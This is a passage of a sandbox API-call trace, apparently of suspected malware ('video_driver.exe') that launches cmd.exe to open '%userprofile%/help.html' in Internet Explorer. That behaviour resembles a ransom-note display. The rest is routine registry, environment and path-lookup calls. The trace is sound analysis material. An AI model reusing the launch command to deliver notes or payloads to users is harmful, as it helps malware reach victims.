lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x0, lpData=0x20ea90*=0x40, lpcbData=0x20ea88*=0x1000) returned 0x2 [0043.310] RegCloseKey (hKey=0x68) returned 0x0 [0043.310] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea84 | out: phkResult=0x20ea84*=0x68) returned 0x0 [0043.310] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x0, lpData=0x20ea90*=0x40, lpcbData=0x20ea88*=0x1000) returned 0x2 [0043.310] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x4, lpData=0x20ea90*=0x1, lpcbData=0x20ea88*=0x4) returned 0x0 [0043.310] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x0, lpData=0x20ea90*=0x1, lpcbData=0x20ea88*=0x1000) returned 0x2 [0043.310] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x4, lpData=0x20ea90*=0x0, lpcbData=0x20ea88*=0x4) returned 0x0 [0043.310] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x4, lpData=0x20ea90*=0x9, lpcbData=0x20ea88*=0x4) returned 0x0 [0043.310] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x4, lpData=0x20ea90*=0x9, lpcbData=0x20ea88*=0x4) returned 0x0 [0043.310] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x0, lpData=0x20ea90*=0x9, lpcbData=0x20ea88*=0x1000) returned 0x2 [0043.311] RegCloseKey (hKey=0x68) returned 0x0 [0043.311] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b63 [0043.311] srand (_Seed=0x5eb34b63) [0043.311] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c start iexplore.exe %userprofile%/help.html" [0043.311] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c start iexplore.exe %userprofile%/help.html" [0043.311] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a295260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0043.311] GetProcessHeap () returned 0x3b0000 [0043.311] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x210) returned 0x3c2088 [0043.311] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c2090, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0043.311] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a2a0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0043.311] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a2a0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0043.312] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a2a0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0043.312] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0043.312] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0043.312] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0043.312] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0043.312] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0043.312] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0043.312] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0043.312] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0043.312] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0043.312] GetProcessHeap () returned 0x3b0000 [0043.312] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c2b60 | out: hHeap=0x3b0000) returned 1 [0043.312] GetEnvironmentStringsW () returned 0x3c22a0* [0043.312] GetProcessHeap () returned 0x3b0000 [0043.312] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xae2) returned 0x3c4c00 [0043.312] FreeEnvironmentStringsW (penv=0x3c22a0) returned 1 [0043.312] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a2a0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0043.312] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a2a0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0043.312] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0043.313] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0043.313] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0043.313] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0043.313] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0043.313] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0043.313] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0043.313] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0043.313] GetProcessHeap () returned 0x3b0000 [0043.313] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x54) returned 0x3c56f0 [0043.313] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f850 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0043.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x20f850, lpFilePart=0x20f84c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x20f84c*="Desktop") returned 0x25 [0043.313] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0043.313] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f5cc | out: lpFindFileData=0x20f5cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3c1f08 [0043.313] FindClose (in: hFindFile=0x3c1f08 | out: hFindFile=0x3c1f08) returned 1 [0043.313] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x20f5cc | out: lpFindFileData=0x20f5cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x108960, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x108960, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3c1f08 [0043.314] FindClose (in: hFindFile=0x3c1f08 | out: hFindFile=0x3c1f08) returned 1 [0043.314] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0043.314] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x20f5cc | out: lpFindFileData=0x20f5cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3c1f08 [0043.314] FindClose (in: hFindFile=0x3c1f08 | out: hFindFile=0x3c1f08) returned 1 [0043.314] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0043.314] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0043.314] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0043.314] GetProcessHeap () returned 0x3b0000 [0043.314] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c4c00 | out: hHeap=0x3b0000) returned 1 [0043.314] GetEnvironmentStringsW () returned 0x3c4110* [0043.314] GetProcessHeap () returned 0x3b0000 [0043.314] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb36) returned 0x3c5f50 [0043.315] FreeEnvironmentStringsW (penv=0x3c4110) returned 1 [0043.315] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a295260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0043.315] GetProcessHeap () returned 0x3b0000 [0043.315] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c56f0 | out: hHeap=0x3b0000) returned 1 [0043.315] GetProcessHeap () returned 0x3b0000 [0043.315] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x400e) returned 0x3c6a90 [0043.316] GetProcessHeap () returned 0x3b0000 [0043.316] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x62) returned 0x3c2de0 [0043.316] GetProcessHeap () returned 0x3b0000 [0043.316] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c6a90 | out: hHeap=0x3b0000) returned 1 [0043.316] GetConsoleOutputCP () returned 0x1b5 [0043.316] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a294260 | out: lpCPInfo=0x4a294260) returned 1 [0043.316] GetUserDefaultLCID () returned 0x409 [0043.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a294950, cchData=8 | out: lpLCData=":") returned 2 [0043.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f990, cchData=128 | out: lpLCData="0") returned 2 [0043.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f990, cchData=128 | out: lpLCData="0") returned 2 [0043.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f990, cchData=128 | out: lpLCData="1") returned 2 [0043.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a294940, cchData=8 | out: lpLCData="/") returned 2 [0043.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a294d80, cchData=32 | out: lpLCData="Mon") returned 4 [0043.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a294d40, cchData=32 | out: lpLCData="Tue") returned 4 [0043.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a294d00, cchData=32 | out: lpLCData="Wed") returned 4 [0043.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a294cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0043.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a294c80, cchData=32 | out: lpLCData="Fri") returned 4 [0043.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a294c40, cchData=32 | out: lpLCData="Sat") returned 4 [0043.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a294c00, cchData=32 | out: lpLCData="Sun") returned 4 [0043.318] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a294930, cchData=8 | out: lpLCData=".") returned 2 [0043.318] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a294920, cchData=8 | out: lpLCData=",") returned 2 [0043.318] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0043.319] GetProcessHeap () returned 0x3b0000 [0043.319] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x20c) returned 0x3c2e50 [0043.319] GetConsoleTitleW (in: lpConsoleTitle=0x3c2e50, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0043.319] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0043.320] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0043.320] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0043.320] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0043.320] GetProcessHeap () returned 0x3b0000 [0043.320] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x400a) returned 0x3c6a90 [0043.321] GetProcessHeap () returned 0x3b0000 [0043.321] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4008) returned 0x3caaa8 [0043.321] GetProcessHeap () returned 0x3b0000 [0043.321] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x20) returned 0x3c5790 [0043.321] GetEnvironmentVariableW (in: lpName="userprofile", lpBuffer=0x4a2a0640, nSize=0x2000 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0043.321] GetProcessHeap () returned 0x3b0000 [0043.321] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c5790 | out: hHeap=0x3b0000) returned 1 [0043.321] GetProcessHeap () returned 0x3b0000 [0043.321] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3caaa8 | out: hHeap=0x3b0000) returned 1 [0043.321] GetProcessHeap () returned 0x3b0000 [0043.321] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c6a90 | out: hHeap=0x3b0000) returned 1 [0043.322] _wcsicmp (_String1="start", _String2=")") returned 74 [0043.322] _wcsicmp (_String1="FOR", _String2="start") returned -13 [0043.322] _wcsicmp (_String1="FOR/?", _String2="start") returned -13 [0043.322] _wcsicmp (_String1="IF", _String2="start") returned -10 [0043.322] _wcsicmp (_String1="IF/?", _String2="start") returned -10 [0043.322] _wcsicmp (_String1="REM", _String2="start") returned -1 [0043.322] _wcsicmp (_String1="REM/?", _String2="start") returned -1 [0043.322] GetProcessHeap () returned 0x3b0000 [0043.322] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x58) returned 0x3c3068 [0043.322] GetProcessHeap () returned 0x3b0000 [0043.322] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x14) returned 0x3c30c8 [0043.324] GetProcessHeap () returned 0x3b0000 [0043.324] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x74) returned 0x3c6aa8 [0043.325] GetConsoleTitleW (in: lpConsoleTitle=0x20f688, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0043.325] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0043.325] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0043.325] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0043.325] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0043.325] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0043.325] _wcsicmp (_String1="start", _String2="CD") returned 16 [0043.325] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0043.326] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0043.326] _wcsicmp (_String1="start", _String2="REN") returned 1 [0043.326] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0043.326] _wcsicmp (_String1="start", _String2="SET") returned 15 [0043.326] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0043.326] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0043.326] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0043.326] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0043.326] _wcsicmp (_String1="start", _String2="MD") returned 6 [0043.326] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0043.326] _wcsicmp (_String1="start", _String2="RD") returned 1 [0043.326] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0043.326] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0043.326] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0043.326] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0043.326] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0043.326] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0043.326] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0043.326] _wcsicmp (_String1="start", _String2="VER") returned -3 [0043.326] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0043.326] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0043.326] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0043.326] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0043.326] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0043.326] _wcsicmp (_String1="start", _String2="START") returned 0 [0043.326] GetProcessHeap () returned 0x3b0000 [0043.326] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe0) returned 0x3c30e8 [0043.331] GetProcessHeap () returned 0x3b0000 [0043.331] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c30e8, Size=0x78) returned 0x3c30e8 [0043.331] GetProcessHeap () returned 0x3b0000 [0043.331] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c30e8) returned 0x78 [0043.331] GetProcessHeap () returned 0x3b0000 [0043.331] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x80) returned 0x3c3168 [0043.333] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0043.333] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0043.333] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0043.333] _wcsicmp (_String1="iexplore.exe", _String2="DIR") returned 5 [0043.333] _wcsicmp (_String1="iexplore.exe", _String2="ERASE") returned 4 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="DEL") returned 5 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="TYPE") returned -11 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="COPY") returned 6 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="CD") returned 6 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="CHDIR") returned 6 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="RENAME") returned -9 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="REN") returned -9 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="ECHO") returned 4 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="SET") returned -10 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="PAUSE") returned -7 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="DATE") returned 5 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="TIME") returned -11 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="PROMPT") returned -7 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="MD") returned -4 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="MKDIR") returned -4 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="RD") returned -9 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="RMDIR") returned -9 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="PATH") returned -7 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="GOTO") returned 2 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="SHIFT") returned -10 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="CLS") returned 6 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="CALL") returned 6 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="VERIFY") returned -13 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="VER") returned -13 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="VOL") returned -13 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="EXIT") returned 4 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="SETLOCAL") returned -10 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="ENDLOCAL") returned 4 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="TITLE") returned -11 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="START") returned -10 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="DPATH") returned 5 [0043.334] _wcsicmp (_String1="iexplore.exe", _String2="KEYS") returned -2 [0043.335] _wcsicmp (_String1="iexplore.exe", _String2="MOVE") returned -4 [0043.335] _wcsicmp (_String1="iexplore.exe", _String2="PUSHD") returned -7 [0043.335] _wcsicmp (_String1="iexplore.exe", _String2="POPD") returned -7 [0043.335] _wcsicmp (_String1="iexplore.exe", _String2="ASSOC") returned 8 [0043.335] _wcsicmp (_String1="iexplore.exe", _String2="FTYPE") returned 3 [0043.335] _wcsicmp (_String1="iexplore.exe", _String2="BREAK") returned 7 [0043.335] _wcsicmp (_String1="iexplore.exe", _String2="COLOR") returned 6 [0043.335] _wcsicmp (_String1="iexplore.exe", _String2="MKLINK") returned -4 [0043.335] _wcsicmp (_String1="iexplore.exe", _String2="FOR") returned 3 [0043.335] _wcsicmp (_String1="iexplore.exe", _String2="IF") returned -1 [0043.335] _wcsicmp (_String1="iexplore.exe", _String2="REM") returned -9 [0043.335] _wcsnicmp (_String1="iexp", _String2="cmd ", _MaxCount=0x4) returned 6 [0043.335] GetProcessHeap () returned 0x3b0000 [0043.335] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x418) returned 0x3c31f0 [0043.335] SetErrorMode (uMode=0x0) returned 0x0 [0043.335] SetErrorMode (uMode=0x1) returned 0x0 [0043.336] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3c31f8, lpFilePart=0x1f2e20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1f2e20*="Desktop") returned 0x25 [0043.336] SetErrorMode (uMode=0x0) returned 0x1 [0043.336] GetProcessHeap () returned 0x3b0000 [0043.336] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c31f0, Size=0x6e) returned 0x3c31f0 [0043.336] GetProcessHeap () returned 0x3b0000 [0043.336] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c31f0) returned 0x6e [0043.336] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a2a0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0043.336] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0043.336] GetProcessHeap () returned 0x3b0000 [0043.336] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x120) returned 0x3c3268 [0043.336] GetProcessHeap () returned 0x3b0000 [0043.336] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x238) returned 0x3c3390 [0043.339] GetProcessHeap () returned 0x3b0000 [0043.339] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c3390, Size=0x122) returned 0x3c3390 [0043.339] GetProcessHeap () returned 0x3b0000 [0043.339] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c3390) returned 0x122 [0043.339] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a2a0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0043.339] GetProcessHeap () returned 0x3b0000 [0043.339] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe0) returned 0x3c34c0 [0043.339] GetProcessHeap () returned 0x3b0000 [0043.339] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c34c0, Size=0x76) returned 0x3c34c0 [0043.339] GetProcessHeap () returned 0x3b0000 [0043.339] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c34c0) returned 0x76 [0043.340] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.340] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iexplore.exe", fInfoLevelId=0x1, lpFindFileData=0x1f2bbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2bbc) returned 0xffffffff [0043.340] GetLastError () returned 0x2 [0043.340] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iexplore.exe.*", fInfoLevelId=0x1, lpFindFileData=0x1f2b9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2b9c) returned 0xffffffff [0043.340] GetLastError () returned 0x2 [0043.341] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iexplore.exe", fInfoLevelId=0x1, lpFindFileData=0x1f2b9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2b9c) returned 0xffffffff [0043.341] GetLastError () returned 0x2 [0043.341] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.341] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\iexplore.exe", fInfoLevelId=0x1, lpFindFileData=0x1f2bbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2bbc) returned 0xffffffff [0043.341] GetLastError () returned 0x2 [0043.341] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\iexplore.exe.*", fInfoLevelId=0x1, lpFindFileData=0x1f2b9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2b9c) returned 0xffffffff [0043.341] GetLastError () returned 0x2 [0043.341] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\iexplore.exe", fInfoLevelId=0x1, lpFindFileData=0x1f2b9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2b9c) returned 0xffffffff [0043.341] GetLastError () returned 0x2 [0043.341] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.341] FindFirstFileExW (in: lpFileName="C:\\Windows\\iexplore.exe", fInfoLevelId=0x1, lpFindFileData=0x1f2bbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2bbc) returned 0xffffffff [0043.342] GetLastError () returned 0x2 [0043.342] FindFirstFileExW (in: lpFileName="C:\\Windows\\iexplore.exe.*", fInfoLevelId=0x1, lpFindFileData=0x1f2b9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2b9c) returned 0xffffffff [0043.342] GetLastError () returned 0x2 [0043.342] FindFirstFileExW (in: lpFileName="C:\\Windows\\iexplore.exe", fInfoLevelId=0x1, lpFindFileData=0x1f2b9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2b9c) returned 